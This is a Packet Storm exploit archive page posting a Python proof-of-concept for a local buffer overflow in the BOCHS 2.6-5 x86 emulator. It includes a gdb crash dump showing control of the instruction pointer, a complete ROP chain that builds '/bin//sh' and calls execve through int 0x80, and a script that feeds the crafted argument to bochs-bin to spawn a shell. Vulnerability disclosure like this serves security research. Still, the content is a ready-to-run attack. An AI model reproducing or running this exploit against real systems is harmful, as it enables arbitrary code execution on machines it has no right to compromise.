Twenty Year Anniversary

BOCHS 2.6-5 Local Buffer Overflow

BOCHS 2.6-5 Local Buffer Overflow
Posted Feb 5, 2018
Authored by Juan Sacco

BOCHS version 2.6-5 suffers from a local buffer overflow vulnerability.

tags | exploit, overflow, local
MD5 | ef2db4986d49397d9379bd42918b2da5

BOCHS 2.6-5 Local Buffer Overflow

Change Mirror Download
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Program description:
# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that
# runs on most popular platforms. It includes emulation of the Intel x86 CPU,
# common I/O devices, and a custom BIOS.
#
# Homepage: http://bochs.sourceforge.net/
# Version: 2.6-5
# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb

import os, subprocess
from struct import pack

# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'`
#
# Program received signal SIGSEGV, Segmentation fault.
#
# [----------------------------------registers-----------------------------------]
# EAX: 0x1
# EBX: 0x41414141 ('AAAA')
# ECX: 0x8167fa0
(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov
edx,DWORD PTR [esp+0x8])
# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90
(<_ZN13bx_real_sim_cD2Ev>: repz ret)
# ESI: 0x41414141 ('AAAA')
# EDI: 0x41414141 ('AAAA')
# EBP: 0x41414141 ('AAAA')
# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# EIP: 0x41424344 ('DCBA')
# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41424344
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2
# 0008| 0xbfffedc8 --> 0x0
# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# 0016| 0xbfffedd0 --> 0x2
# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0
# 0024| 0xbfffedd8 --> 0x0
# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41424344 in ?? ()

# Padding goes here
junk = 'A'*1200
ropchain = pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276424) # @ .data + 4
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08054cc4) # pop ebx ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x08235733) # pop ecx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x082350b5) # pop edx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804f101) # int 0x80
crafted_buff = junk + ropchain

try:
print("[*] BOCHS 2.6-5 Buffer Overflow - Exploit by Juan Sacco")
print("[*] Running, wait for the shell")
subprocess.call(["bochs-bin", crafted_buff])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "[*] Sorry! BOCHS not found!"
else:
print "[*] Error executing exploit"
raise


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close